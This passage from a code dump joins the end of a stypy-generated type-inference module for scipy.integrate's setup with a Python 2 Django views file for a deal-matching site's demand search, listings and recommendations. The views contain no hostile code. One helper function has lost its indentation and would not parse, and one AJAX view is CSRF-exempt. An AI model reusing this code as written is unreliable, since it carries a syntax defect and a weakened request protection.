# Getting the type of 'config' (line 88)
config_32339 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 88, 4), 'config', False)
# Obtaining the member 'add_extension' of a type (line 88)
add_extension_32340 = module_type_store.get_type_of_member(stypy.reporting.localization.Localization(__file__, 88, 4), config_32339, 'add_extension')
# Calling add_extension(args, kwargs) (line 88)
add_extension_call_result_32356 = invoke(stypy.reporting.localization.Localization(__file__, 88, 4), add_extension_32340, *[str_32341], **kwargs_32355)
# Call to add_subpackage(...): (line 94)
# Processing the call arguments (line 94)
str_32359 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 94, 26), 'str', '_ivp')
# Processing the call keyword arguments (line 94)
kwargs_32360 = {}
# Getting the type of 'config' (line 94)
config_32357 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 94, 4), 'config', False)
# Obtaining the member 'add_subpackage' of a type (line 94)
add_subpackage_32358 = module_type_store.get_type_of_member(stypy.reporting.localization.Localization(__file__, 94, 4), config_32357, 'add_subpackage')
# Calling add_subpackage(args, kwargs) (line 94)
add_subpackage_call_result_32361 = invoke(stypy.reporting.localization.Localization(__file__, 94, 4), add_subpackage_32358, *[str_32359], **kwargs_32360)
# Call to add_data_dir(...): (line 96)
# Processing the call arguments (line 96)
str_32364 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 96, 24), 'str', 'tests')
# Processing the call keyword arguments (line 96)
kwargs_32365 = {}
# Getting the type of 'config' (line 96)
config_32362 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 96, 4), 'config', False)
# Obtaining the member 'add_data_dir' of a type (line 96)
add_data_dir_32363 = module_type_store.get_type_of_member(stypy.reporting.localization.Localization(__file__, 96, 4), config_32362, 'add_data_dir')
# Calling add_data_dir(args, kwargs) (line 96)
add_data_dir_call_result_32366 = invoke(stypy.reporting.localization.Localization(__file__, 96, 4), add_data_dir_32363, *[str_32364], **kwargs_32365)
# Getting the type of 'config' (line 97)
config_32367 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 97, 11), 'config')
# Assigning a type to the variable 'stypy_return_type' (line 97)
module_type_store.set_type_of(stypy.reporting.localization.Localization(__file__, 97, 4), 'stypy_return_type', config_32367)
# ################# End of 'configuration(...)' code ##################
# Teardown call information
teardown_call_information(localization, arguments)
# Storing the return type of function 'configuration' in the type store
# Getting the type of 'stypy_return_type' (line 9)
stypy_return_type_32368 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 9, 0), 'stypy_return_type')
module_type_store.store_return_type_of_current_context(stypy_return_type_32368)
# Destroy the current context
module_type_store = module_type_store.close_function_context()
# Return type of the function 'configuration'
return stypy_return_type_32368
# --- stypy-generated module epilogue (auto-generated; do not hand-edit) ---
# NOTE(review): indentation below is reconstructed from the standard stypy
# output layout — the original file's leading whitespace was not visible in
# this view; confirm against the generated artifact before applying.
# Assigning a type to the variable 'configuration' (line 9)
module_type_store.set_type_of(stypy.reporting.localization.Localization(__file__, 9, 0), 'configuration', configuration)
if (__name__ == '__main__'):
    stypy.reporting.localization.Localization.set_current(stypy.reporting.localization.Localization(__file__, 101, 4))
    # 'from numpy.distutils.core import setup' statement (line 101)
    update_path_to_current_file_folder('C:/Python27/lib/site-packages/scipy/integrate/')
    import_32369 = generate_type_inference_code_for_module(stypy.reporting.localization.Localization(__file__, 101, 4), 'numpy.distutils.core')
    if (type(import_32369) is not StypyTypeError):
        if (import_32369 != 'pyd_module'):
            __import__(import_32369)
            sys_modules_32370 = sys.modules[import_32369]
            import_from_module(stypy.reporting.localization.Localization(__file__, 101, 4), 'numpy.distutils.core', sys_modules_32370.module_type_store, module_type_store, ['setup'])
            nest_module(stypy.reporting.localization.Localization(__file__, 101, 4), __file__, sys_modules_32370, sys_modules_32370.module_type_store, module_type_store)
        else:
            from numpy.distutils.core import setup
            import_from_module(stypy.reporting.localization.Localization(__file__, 101, 4), 'numpy.distutils.core', None, module_type_store, ['setup'], [setup])
    else:
        # Assigning a type to the variable 'numpy.distutils.core' (line 101)
        module_type_store.set_type_of(stypy.reporting.localization.Localization(__file__, 101, 4), 'numpy.distutils.core', import_32369)
    remove_current_file_folder_from_path('C:/Python27/lib/site-packages/scipy/integrate/')
    # Call to setup(...): (line 102)
    # Processing the call keyword arguments (line 102)
    # Call to todict(...): (line 102)
    # Processing the call keyword arguments (line 102)
    kwargs_32378 = {}
    # Call to configuration(...): (line 102)
    # Processing the call keyword arguments (line 102)
    str_32373 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 102, 35), 'str', '')
    keyword_32374 = str_32373
    kwargs_32375 = {'top_path': keyword_32374}
    # Getting the type of 'configuration' (line 102)
    configuration_32372 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 102, 12), 'configuration', False)
    # Calling configuration(args, kwargs) (line 102)
    configuration_call_result_32376 = invoke(stypy.reporting.localization.Localization(__file__, 102, 12), configuration_32372, *[], **kwargs_32375)
    # Obtaining the member 'todict' of a type (line 102)
    todict_32377 = module_type_store.get_type_of_member(stypy.reporting.localization.Localization(__file__, 102, 12), configuration_call_result_32376, 'todict')
    # Calling todict(args, kwargs) (line 102)
    todict_call_result_32379 = invoke(stypy.reporting.localization.Localization(__file__, 102, 12), todict_32377, *[], **kwargs_32378)
    kwargs_32380 = {'todict_call_result_32379': todict_call_result_32379}
    # Getting the type of 'setup' (line 102)
    setup_32371 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 102, 4), 'setup', False)
    # Calling setup(args, kwargs) (line 102)
    setup_call_result_32381 = invoke(stypy.reporting.localization.Localization(__file__, 102, 4), setup_32371, *[], **kwargs_32380)
# ################# End of the type inference program ##################
# Collect accumulated type errors/warnings for reporting.
module_errors = stypy.errors.type_error.StypyTypeError.get_error_msgs()
module_warnings = stypy.errors.type_warning.TypeWarning.get_warning_msgs()
|
7,964 | fb16009985ee7fe4a467a94160f593723b5aaf03 | # -*- coding: utf-8 -*-
from django.http import Http404
from django.shortcuts import render,render_to_response, get_object_or_404, redirect, HttpResponse
from django.core.context_processors import csrf
from django.views.decorators.csrf import csrf_protect, csrf_exempt
from django.template import RequestContext,Context
from django.template.loader import get_template
import os, sys
from newchama import settings
from newchama.helper import member_login_required
from xhtml2pdf import pisa
import StringIO
import datetime
from services.models import Deal,CompanyWithPE,Demand, Country, Industry, Member, Company, StatusDemand, Province, City, DemandAttach, DemandIndustry, InvestmentCompany, DemandOtherTargetCompany, ListedCompany
from services.models import DemandViewLog, Message, DemandViewLog, Favorites, TypeFavorite, DemandVisitor, Project,News, StatusProject,Preference, PreferenceIndustry, PreferenceLocation, PreferenceKeyword
from services.models import ConditionDemand, DemandKeyword, DemandKeywordEn
from services.helper import Helper
from recommond.views import update_project_recommond_list
from recommond.models import RecommondProjectItem
from django.utils.translation import ugettext_lazy as _
from django.contrib import messages
import logging
import random
import zipfile
from django.db.models import Q, Sum, connection
from sets import Set as set
from django.utils import simplejson
from log.views import *
logger = logging.getLogger(__name__)
@member_login_required
def addsuccess(request):
    """Render the confirmation page shown after a demand was submitted."""
    context = {
        'title': _("Buyer Recommended"),
        'member': request.session.get('member', None),
    }
    template_path = "purchase/" + request.lang + "/add_success.html"
    return render_to_response(template_path, context,
                              context_instance=RequestContext(request))
def _is_has_condition(condition):
return condition != "" and condition != "0"
@member_login_required
def search(request):
    """Demand (purchase) search page.

    Always renders the search form; when ``is_search=1`` is present it
    additionally runs the query built from the GET filters (keyword,
    type, country, three-level industry) and puts the first 5 hits in
    the context for the template.
    """
    c = {}
    c.update(request)
    c['title'] = _("Purchase Search")
    c['member'] = request.session.get('member', None)
    member_id = request.session['member']['id']
    is_search = request.GET.get("is_search", "")
    if is_search == '1':
        is_has_condition = False  # flips True once any filter is supplied
        condition = ConditionDemand()
        condition.status = StatusDemand.approved
        # NOTE(review): this queryset is never used below -- find_demands()
        # performs the actual query; this looks like dead code.
        demands = Demand.objects.filter(status=StatusDemand.approved)
        keyword = request.GET.get("keyword", "")
        country = request.GET.get("country", "")
        #province = request.GET.get("province", "")
        #city = request.GET.get("city", "")
        type = request.GET.get("type", "")
        industry_first = request.GET.get("industry_first", "")
        industry_second = request.GET.get("industry_second", "")
        industry_third = request.GET.get("industry_third", "")
        if keyword != "":
            c["keyword"] = keyword
            is_has_condition = True
        if type != "":
            c["type"] = int(type)
            is_has_condition = True
        country_id = 0
        #province_id = 0
        #city_id = 0
        if _is_has_condition(country):
            country_id = int(country)
            c["country"] = country_id
            is_has_condition = True
        # Most specific selected industry level wins (third > second > first).
        industry = ""
        if _is_has_condition(industry_first):
            industry = industry_first
            c["industry_first"] = int(industry_first)
        if _is_has_condition(industry_second):
            industry = industry_second
            c["industry_second"] = int(industry_second)
        if _is_has_condition(industry_third):
            industry = industry_third
            c["industry_third"] = int(industry_third)
        if industry != "":
            industry_condition = Industry.objects.get(pk=industry)
            condition.industry = industry_condition
            is_has_condition = True
        condition.country_id = country_id
        condition.keyword = keyword
        condition.type = type
        sort = "time_desc"
        if is_has_condition:
            # First page only (5 rows); 'has_more' drives the client-side
            # "load more" control.
            data, total = find_demands(condition, 1, 5, sort)
            c['has_more'] = total > 5
            c['demands'] = data
        c['favorites_demand_ids'] = Helper.find_member_favorite_demand_ids(member_id)
        c['is_search'] = True
        c['is_has_condition'] = is_has_condition
    # Option lists for the search form (always needed).
    c["SERVICE_TYPES"] = Demand.SERVICE_TYPES
    c["countries"] = Helper.find_countries()
    c["industries"] = Helper.find_industries_level1()
    return render_to_response("purchase/"+request.lang+"/search.html", c, context_instance=RequestContext(request))
@member_login_required
def search_keyword(request):
    """Global keyword search landing page (demands tab).

    Shows the first 5 approved demands whose CN/EN name contains the
    keyword, plus hit counts for the other tabs (projects, news,
    companies, members) so the template can render tab badges. Writes a
    search-log entry for the member.
    """
    c = {}
    c['title'] = _("Search")
    keyword = request.GET.get("keyword", '')
    c['member'] = request.session.get('member', None)
    member_id = request.session['member']['id']
    member = get_object_or_404(Member,pk=member_id)
    c["keyword"] = keyword
    demands = Demand.objects.filter(Q(status=StatusDemand.approved) & (Q(name_cn__contains=keyword) | Q(name_en__contains=keyword)))
    c['demands'] = demands[0:5]
    c['total_project'] = Project.objects.filter(Q(status=StatusProject.approved) & (Q(name_cn__contains=keyword) | Q(name_en__contains=keyword))).count()
    c['total_demand'] = demands.count()
    c['total_news'] = News.objects.filter(Q(title__contains=keyword) | Q(tag__contains=keyword)).count()
    # Company id=27 is excluded here and elsewhere -- presumably the site's
    # own company record; TODO confirm.
    c['total_company'] = Company.objects.filter(Q(short_name_cn__contains=keyword) | Q(short_name_en__contains=keyword)).exclude(id=27).count()
    c['total_member'] = Member.objects.filter(Q(last_name__contains=keyword) | Q(first_name__contains=keyword)).count()
    c['favorites_demand_ids'] = Helper.find_member_favorite_demand_ids(member_id)
    write_search_demand_log(request,member,keyword)
    return render_to_response("purchase/"+request.lang+"/search_keyword.html", c, context_instance=RequestContext(request))
@member_login_required
def new(request):
    """'Latest demands' listing page.

    Builds a ConditionDemand from the optional GET filters (type,
    keywords, country, province, industry), fetches the first page of 10
    approved demands via find_demands(), and supplies the filter option
    lists for the sidebar. Further pages come from ajax_more().
    """
    c = {}
    c['title'] = _("New Purchase")
    c['member'] = request.session.get('member', None)
    # Retired implementation kept for reference:
    # member_id = request.session['member']['id']
    # demands = Demand.objects.filter(status=StatusDemand.approved)
    # sort = request.GET.get("sort", "time_desc")
    # c['sort'] = sort
    # c[sort] = "active"
    # if sort == "time_desc":
    # demands = demands.order_by("-id")
    # elif sort == "time_asc":
    # demands = demands.order_by("id")
    # check the preference is setting
    # pi = PreferenceIndustry.objects.filter(preference__member__id=member_id, preference__title="demand")
    # pn = PreferenceKeyword.objects.filter(preference__member__id=member_id, preference__title="demand")
    # pl = PreferenceLocation.objects.filter(preference__member__id=member_id, preference__title="demand")
    # if len(pi) == 0 and len(pl) == 0 and len(pn) == 0:
    # c['need_preference'] = True
    # c['demands'] = demands[0:50]
    # else:
    # c['need_preference'] = False
    # c['demands'] = demands[0:10]
    # check finish
    member_id = request.session['member']['id']
    type = request.GET.get('type', 0)
    keyword = request.GET.get('keywords', '')
    country_id = request.GET.get('country_id', 0)
    province_id = request.GET.get('province_id', 0)
    industry_id = request.GET.get('industry_id', 0)
    sort = request.GET.get('sort', 'time_desc')
    condition = ConditionDemand()
    condition.country_id = country_id
    condition.keyword = keyword
    condition.status = StatusDemand.approved
    condition.province_id = province_id
    condition.type = type
    level = 1  # NOTE(review): assigned but never read after this function
    if industry_id != "" and industry_id != "0" and industry_id != 0:
        condition.industry = Industry.objects.get(pk=industry_id)
        level = condition.industry.level
    pagesize = 10
    # First page only; the template shows "load more" while a full page
    # came back.
    data, total = find_demands(condition, 1, pagesize, sort)
    c["have_more_data"] = len(data) == int(pagesize)
    c['demands'] = data
    c['favorites_demand_ids'] = Helper.find_member_favorite_demand_ids(member_id)
    c['countries'] = Helper.find_countries()
    c['industries'] = Helper.find_industries_level1()
    c['total'] = total
    return render_to_response("purchase/"+request.lang+"/new.html", c, context_instance=RequestContext(request))
@member_login_required
def banking_genius(request, id_post):
    """Recommendation page for a demand: projects matched to demand *id_post*.

    Fix: ``page``/``pagesize`` arrive as strings from the query string and
    the old code sliced the list with them directly (``[page:pagesize]``),
    which raises TypeError for any explicit value and paginated wrongly in
    any case. They are now converted to int and turned into a start/end
    window, consistent with json_recommend(). Page 0 (the old default) and
    page 1 both mean the first page, so default behaviour is unchanged.
    """
    c = {}
    c['title'] = _("New Purchase")
    c['member'] = request.session.get('member', None)
    try:
        page = int(request.GET.get('page', 0))
        pagesize = int(request.GET.get('pagesize', 10))
        start_record = max(page - 1, 0) * pagesize
        end_record = start_record + pagesize
        condition = recommendCondiction(request, id_post)
        c["totalRecommend"] = RecommondProjectItem.objects.filter(condition).count()
        c["recommendList"] = list(RecommondProjectItem.objects.filter(condition).order_by('-id'))[start_record : end_record]
    except Exception as e:
        logger.error(e.message)
    c["id"] = id_post
    c["countries"] = Helper.find_countries()
    c["industries"] = Helper.find_industries_level1()
    c["project_title"] = Demand.objects.get(pk=id_post).name_cn
    member_id = request.session['member']['id']
    c['favorites_project_ids'] = Helper.find_member_favorite_project_ids(member_id)
    return render_to_response("purchase/"+request.lang+"/banking_genius.html", c, context_instance=RequestContext(request))
@member_login_required
def json_recommend(request):
    """AJAX endpoint: render one page of recommended projects for a demand.

    Fix: ``page``/``pagesize`` come out of request.POST as strings, so the
    old ``if page <= 1`` clamp compared str to int and never triggered.
    They are now converted to int before clamping, so negative or zero
    values are normalised as intended.
    """
    c = {}
    id_post = request.POST.get("id", False)
    if request.method == "POST":
        try:
            page = int(request.POST.get('page', 1))
            pagesize = int(request.POST.get('pagesize', 10))
            if page <= 1:
                page = 1
            if pagesize <= 1:
                pagesize = 1
            start_record = (page - 1) * pagesize
            end_record = start_record + pagesize
            if id_post:
                condition = recommendCondiction(request, id_post)
                c["recommendList"] = list(RecommondProjectItem.objects.filter(condition).order_by('-id'))[start_record : end_record]
                member_id = request.session['member']['id']
                c['favorites_project_ids'] = Helper.find_member_favorite_project_ids(member_id)
        except Exception as e:
            logger.error(e.message)
    return render_to_response("purchase/"+request.lang+"/json_recommend.html", c, context_instance=RequestContext(request))
@member_login_required
def json_recommend_count(request):
    """AJAX endpoint: return the number of recommended projects for a demand.

    Fix: removed a leftover debug ``print`` statement (stdout noise in
    production); the count is logged at debug level instead.
    """
    count = 0
    id_post = request.POST.get("id", False)
    if request.method == "POST":
        try:
            if id_post:
                condition = recommendCondiction(request, id_post)
                count = RecommondProjectItem.objects.filter(condition).count()
                logger.debug("recommend count for demand %s: %s", id_post, count)
        except Exception as e:
            logger.error(e.message)
    return HttpResponse(count)
@member_login_required
def sync_recommond(request):
    """Rebuild the project-recommendation list for a demand (POST ``id``).

    Candidates are live projects: status 2 (presumably approved -- matches
    StatusProject usage elsewhere; confirm) and not yet expired.

    Fixes: the old version returned "success" even when the rebuild raised
    (the except block only printed and logged), so callers could never
    detect a failure -- it now returns "failed" on error; the stray debug
    ``print`` was removed.
    """
    result = "success"
    try:
        if request.method == "POST":
            id_post = request.POST.get("id", False)
            if id_post:
                d = Demand.objects.get(pk=id_post)
                project_list = Project.objects.filter(status=2).filter(expire_date__gt=datetime.datetime.now()).order_by('-id')
                update_project_recommond_list(d, project_list)
                result = "success"
    except Exception as e:
        logger.error(e.message)
        result = "failed"
    return HttpResponse(result)
def recommendCondiction(request, id):
    """Build the Q filter used to list RecommondProjectItem rows for demand *id*.

    Optional POST parameters narrow the match by the recommended project's
    location and/or industry; ``target_location_type`` decides whether the
    location id is a province or a country.
    """
    condition = Q(demand_id=id, is_delete=False)
    condition2 = Q()
    target_location_id = request.POST.get('target_location_id', 0)
    target_industry_id = request.POST.get('target_industry_id', 0)
    target_location_type = request.POST.get('target_location_type', 0)
    if target_location_id != "0" and target_location_id != 0:
        if target_location_type == "province":
            condition2 = condition2 | Q (company_province=target_location_id)
        else:
            condition2 = condition2 | Q (company_country=target_location_id)
    if target_industry_id != "0" and target_industry_id != 0:
        condition2 = condition2 | Q (company_industry=target_industry_id)
    if target_location_id != "0" or target_industry_id != "0":
        # NOTE(review): passing a queryset to Q(project=...) relies on
        # Django treating it as a subquery (__in-style) -- confirm intended.
        p = Project.objects.filter(condition2)
        condition = condition & Q (project=p)
    return condition
def preferenceByMemberId(c, member_id):
    """Fill *c* with the member's saved 'demand' preference details and
    return up to three approved demands matching it (by target industry
    and/or country). Returns an empty list when no preference exists.
    """
    matched = []
    prefs = Preference.objects.filter(member_id=member_id, title="demand")[0: 1]
    base_q = Q(status=StatusDemand.approved)
    if len(prefs) > 0:
        pref = prefs[0]
        c['preference_demand_id'] = pref.id
        extra_q = Q()
        industries = pref.preference_industry.all()
        c['pre_demand_indusrtis'] = industries
        if len(industries) > 0:
            for ind in industries:
                extra_q = extra_q | Q(company_industries=ind.industry_id)
        locations = pref.preference_location.all()
        c['pre_demand_locations'] = locations
        if len(locations):
            for loc in locations:
                extra_q = extra_q | Q(company_countries=loc.country_id)
        base_q = base_q & extra_q
        matched = Demand.objects.filter(base_q).order_by("-id").distinct()[0: 3]
    return matched
def demandByMemberId(member_Id):
    """Return up to five of the member's most recent approved demands,
    each wrapped in a dict with dashboard counters.

    Per demand: unread messages, favourites, companies in the demand's
    target industries, and deals in those industries' level-1 ancestors
    over the last 90 days.
    """
    demands = Demand.objects.filter(member_id=member_Id, status=StatusDemand.approved).order_by("-id")[0: 5]
    list_demand = []
    for demand in demands:
        count_message = Message.objects.filter(type_relation=2, demand=demand.id, is_read=0).count()
        count_favor = Favorites.objects.filter(type_relation=1, demand=demand.id).count()
        company_industries = demand.company_industries.all()
        count_company = 0
        count_industry = 0
        if company_industries:
            industry_ids = []
            industry_level_1_id = []
            for c in company_industries:
                industry_ids.append(c.id)
                industry_level = c.level
                industry_id = c.id
                # Walk up to the level-1 ancestor: Deal rows are keyed by
                # the top industry level (cv1).
                if industry_level == 2:
                    industry_id = c.father_id
                elif industry_level == 3:
                    industry_id = c.father.father_id
                industry_level_1_id.append(industry_id)
            # id=27 excluded -- presumably the site's own company; TODO confirm.
            count_company = Company.objects.filter(industry__in=industry_ids, status=1).exclude(id=27).count()
            #start_date = datetime.date(datetime.datetime.today().year, datetime.datetime.today().month - 3, datetime.datetime.today().day)
            start_date = datetime.datetime.today()-datetime.timedelta(days=90)
            count_industry = Deal.objects.filter(cv1__in=industry_level_1_id, happen_date__gt=start_date).count()
        pro = {}
        pro["demand"] = demand
        pro["count_message"] = count_message
        pro["count_favor"] = count_favor
        pro["count_industry"] = count_industry
        pro["count_company"] = count_company
        list_demand.append(pro)
    return list_demand
def countDemandStuffTotal(member_id):
    """Aggregate dashboard totals over all of the member's approved demands.

    Returns a dict with: summed page views, unread messages (currently
    hard-coded to 0 -- the real query is kept commented out), favourite
    count, and counts of recommendable companies / recent deals (last 90
    days) in the demands' industries.

    Fixes: ``recommend_companies`` / ``recommend_industries`` are now
    initialised before the ``if demands:`` branch so a member with no
    approved demands cannot hit a NameError when the result dict is
    built, and an unused ``connection.cursor()`` (an open cursor that was
    never closed or used) was removed.
    """
    pvs = Demand.objects.filter(member_id=member_id, status=StatusDemand.approved).aggregate(sum_pv=Sum('pv'))
    messages = 0#Message.objects.filter(type_relation=2, demand__member__id=member_id, is_read=0, is_delete=0).count()
    favorites = Favorites.objects.filter(type_relation=2, demand__member__id=member_id).count()
    demands = Demand.objects.filter(member_id=member_id, status=StatusDemand.approved)
    industry_ids = []
    industry_ids_cv1 = []
    recommend_companies = 0
    recommend_industries = 0
    if demands:
        for d in demands:
            for cv1 in d.demand_industries.all():
                industry_ids_cv1.append(cv1.cv1)
            for industry in d.company_industries.all():
                industry_ids.append(industry.id)
        # id=27 excluded -- presumably the site's own company; TODO confirm.
        recommend_companies = Company.objects.filter(industry__in=set(industry_ids), status=1).exclude(id=27).count()
        #start_date = datetime.date(datetime.datetime.today().year, datetime.datetime.today().month - 3, datetime.datetime.today().day)
        start_date = datetime.datetime.today()-datetime.timedelta(days=90)
        recommend_industries = Deal.objects.filter(cv1__in=set(industry_ids_cv1), happen_date__gt=start_date).count()
    count_demand_all = {}
    count_demand_all["pvs"] = pvs["sum_pv"]
    count_demand_all["messages"] = messages
    count_demand_all["favorites"] = favorites
    count_demand_all["recommend_companies"] = recommend_companies
    count_demand_all["recommend_industries"] = recommend_industries
    return count_demand_all
@csrf_exempt
@member_login_required
def json_index(request):
    """AJAX endpoint for the home-page 'recommended demands' widget.

    Optional comma-separated ``industryId`` / ``locationId`` filters select
    matching approved demands; with neither supplied, the member's saved
    preference is used instead. The result is padded up to 3 items with
    the most recent approved demands.
    """
    c = {}
    member_id = request.session['member']['id']
    if request.method == 'POST':
        try:
            condition = Q(status=StatusDemand.approved)
            condition2 = Q()
            # NOTE(review): filters are read from request.GET although the
            # view only acts on POST -- confirm the client really sends
            # them as query-string parameters.
            industryIds = request.GET.get("industryId", False)
            if industryIds and industryIds != "0":
                ids = industryIds.split(",")
                for id in ids:
                    condition2 = condition2 | Q(company_industries=id)
            locationIds = request.GET.get("locationId", False)
            if locationIds and locationIds != "0":
                ids = locationIds.split(",")
                for id in ids:
                    condition2 = condition2 | Q(company_countries=id)
            condition = condition & condition2
            if industryIds == False and locationIds == False:
                # No explicit filters: fall back to the saved preference.
                result_list = preferenceByMemberId(c, member_id)
            else:
                result_list = Demand.objects.filter(condition).order_by("-id").distinct()[0 : 3]
            c["result_list"] = result_list
            # Pad up to three entries with the latest approved demands.
            list_demand_preference_plus = 3 - len(result_list)
            if list_demand_preference_plus > 0:
                c['recent_demand'] = Demand.objects.filter(status=StatusDemand.approved).order_by("-id")[0: list_demand_preference_plus]
        except Exception, e:
            # print e.message
            logger.error('show demand json error!' + e.message)
    c['favorites_demand_ids'] = Helper.find_member_favorite_demand_ids(member_id)
    return render_to_response("purchase/"+request.lang+"/json_index.html", c, context_instance=RequestContext(request))
def countResult(result):
    """Flatten a Demand into a plain dict with engagement counters for
    the owner's list and detail pages.
    """
    summary = {
        # total_recommends: matched projects that are currently approved.
        'total_recommends': RecommondProjectItem.objects.filter(demand=result, project__status=StatusProject.approved).count(),
        'total_target': 0,
        'total_favorites': Favorites.objects.filter(type_relation=2, demand__id=result.id).count(),
        'not_read_messages': Message.objects.filter(type_relation=2, demand__id=result.id, is_read=0).count(),
        'id': result.id,
        'name_cn': result.name_cn,
        'name_en': result.name_en,
        'status': result.status,
        # Bound methods (not calls): templates invoke them when rendering.
        'statusName': result.get_status_display,
        'processName': result.get_process_display,
        'add_time': result.add_time,
        'pvs': result.pv,
        'integrity': result.integrity,
    }
    return summary
@member_login_required
def mylist(request, type):
    """'My purchases' list: every non-deleted demand owned by the member,
    each wrapped with engagement counters via countResult().

    ``type`` only selects the active tab in the template; the old
    server-side per-status filtering is retained below as a disabled
    block.
    """
    c = {}
    c.update(request)
    c['member'] = request.session.get('member', None)
    member_id = request.session['member']['id']
    demands = Demand.objects.filter(member_id=member_id).exclude(status=StatusDemand.deleted).order_by("-id")
    c['total_all'] = demands.count()
    result_list_2 = []
    for result in demands:
        result_list_2.append(countResult(result))
    c['demands'] = result_list_2
    c[type] = "active"
    c['type'] = type
    '''
    demands_release = demands.filter(status=StatusDemand.approved)
    demands_draft = demands.filter(status=StatusDemand.draft)
    demands_pending = demands.filter(status=StatusDemand.pending)
    demands_not_approved = demands.filter(status=StatusDemand.not_approved)
    demands_offline = demands.filter(status=StatusDemand.offline)
    demands_expired = demands.filter(expire_date__gt=datetime.datetime.today).exclude(status=StatusDemand.deleted)
    d_list = {"release": demands_release, "draft": demands_draft, "pending": demands_pending, "not_approved": demands_not_approved, "expired": demands_expired}
    d_list.update({"offline": demands_offline, "all": demands})
    result_list = d_list.get(type, demands)
    result_list_2 = []
    for result in result_list:
        result_list_2.append(countResult(result))
    c['result_list'] = result_list_2
    total_all = demands.count()
    total_release = demands_release.count()
    total_pending = demands_pending.count()
    total_draft = demands_draft.count()
    total_offline = demands_offline.count()
    total_not_approved = demands_not_approved.count()
    c['total_all'] = total_all
    c['total_release'] = total_release
    c['total_pending'] = total_pending
    c['total_offline'] = total_offline
    c['total_not_approved'] = total_not_approved
    c['total_draft'] = total_draft
    total_project = Project.objects.filter(member_id=member_id).exclude(status=StatusDemand.deleted).count()
    c['total_project'] = total_project
    c[type] = "active"
    c['type'] = type
    c['demands'] = result_list_2
    '''
    return render_to_response("purchase/"+request.lang+"/mylist.html", c, context_instance=RequestContext(request))
'''
@member_login_required
def mylist(request, type, id=0):
c = {}
c.update(request)
c['title'] = _("My Purchases")
c['member'] = request.session.get('member', None)
member_id = request.session['member']['id']
demands = Demand.objects.filter(member_id=member_id).exclude(status=StatusDemand.deleted).order_by("-update_time")
demands_public = demands.filter(target_members=None, target_companies=None, target_industries=None)
demands_private = demands.exclude(target_members=None, target_companies=None, target_industries=None)
demands_release = demands.filter(status=StatusDemand.approved)
demands_draft = demands.filter(status=StatusDemand.draft)
demands_pending = demands.filter(status=StatusDemand.pending)
demands_not_approved = demands.filter(status=StatusDemand.not_approved)
demands_offline = demands.filter(status=StatusDemand.offline)
demands_expired = demands.filter(expire_date__gt=datetime.datetime.today).exclude(status=StatusDemand.deleted)
d_list = {"release": demands_release, "draft": demands_draft, "pending": demands_pending, "not_approved": demands_not_approved, "expired": demands_expired}
d_list.update({"offline": demands_offline, "all": demands, "public": demands_public, "private": demands_private})
result_list = d_list.get(type, demands)
total = result_list.count()
c['total'] = total
total_all = demands.count()
total_public = demands_public.count()
total_private = demands_private.count()
total_draft = demands_draft.count()
c['total_all'] = total_all
c['total_public'] = total_public
c['total_private'] = total_private
c['total_draft'] = total_draft
total_project = Project.objects.filter(member_id=member_id).exclude(status=StatusDemand.deleted).count()
c['total_project'] = total_project
if total == 0:
return render_to_response("purchase/"+request.lang+"/mylist_empty.html", c, context_instance=RequestContext(request))
ids = []
for m in result_list:
ids.append(m.id)
id_current = int(id)
if id_current == 0:
demand = result_list[0]
id_current = demand.id
else:
if id_current not in ids:
raise Http404
pageIndex = ids.index(id_current)+1
demand = result_list[pageIndex-1]
pageIndex = ids.index(id_current)+1
#c['result_list'] = result_list
pageTotal = total
c['pageTotal'] = pageTotal
page_start = 1
page_end = 10
if pageIndex >= 5:
page_start = pageIndex - 4
page_end = pageIndex + 5
if page_end > pageTotal:
page_end = pageTotal
pages = ids[page_start-1:page_end]
id_list_top = enumerate(pages, start=page_start)
id_list = enumerate(pages, start=page_start)
c['id_list_top'] = id_list_top
c['id_list'] = id_list
c['page_start'] = page_start
c['page_end'] = page_end
c[type] = "active"
c['type'] = type
c['d'] = demand
c['pageIndex'] = pageIndex
c['id_current'] = id_current
c['first_id'] = ids[0]
c['end_id'] = ids[total-1]
if pageIndex > 1:
c['pre_id'] = ids[pageIndex-1]
if pageIndex < pageTotal:
c['next_id'] = ids[pageIndex]
if page_end < pageTotal:
c['next_id_page_end'] = ids[page_end]
visitors = DemandVisitor.objects.filter(demand_id=demand.id).order_by("-add_time")
c['visitors'] = visitors
c['visitors_count'] = visitors.count()
followers = Favorites.objects.filter(demand_id=demand.id).order_by("-add_time")
c['followers'] = followers
message_list = Message.objects.filter(demand_id=demand.id).order_by("-add_time")
c['message_list'] = message_list
if len(demand.company_industries.all())>0:
#之后用cv1替代
if demand.company_industries.all()[0].level==3:
c['deal_list_more_id']=demand.company_industries.all()[0].father.father.id
elif demand.company_industries.all()[0].level==2:
c['deal_list_more_id']=demand.company_industries.all()[0].father.id
else:
c['deal_list_more_id']=demand.company_industries.all()[0].id
c['deal_list'] =Deal.objects.filter(cv1=c['deal_list_more_id']).order_by('-update_time')[0:10]
c['compare_cn']= CompanyWithPE.objects.filter(country__name_en='China',industry__id=c['deal_list_more_id']).order_by('-ps')[0:5]
c['compare_usa']= CompanyWithPE.objects.filter(country__name_en='United States of America',industry__id=c['deal_list_more_id']).order_by('-pe')[0:5]
c['compare_hk']= CompanyWithPE.objects.filter(country__name_en='Hong Kong',industry__id=c['deal_list_more_id']).order_by('-pe')[0:5]
c['compare_uk']= CompanyWithPE.objects.filter(country__name_en='United Kingdom',industry__id=c['deal_list_more_id']).order_by('-pe')[0:5]
return render_to_response("purchase/"+request.lang+"/mylist.html", c, context_instance=RequestContext(request))
'''
@member_login_required
def mydetail(request, id):
    """Owner's detail page for one of their own demands.

    404s unless the demand belongs to the logged-in member. Shows
    engagement data (visitors, followers, messages), the top matched
    projects, and comparable deals / listed-company multiples for the
    demand's first target industry.
    """
    c = {}
    member = request.session.get('member', None)
    c['member'] = member
    member_id = request.session['member']['id']
    demand = get_object_or_404(Demand, pk=id, member_id=member_id)
    # c['d'] = demand
    m = countResult(demand)
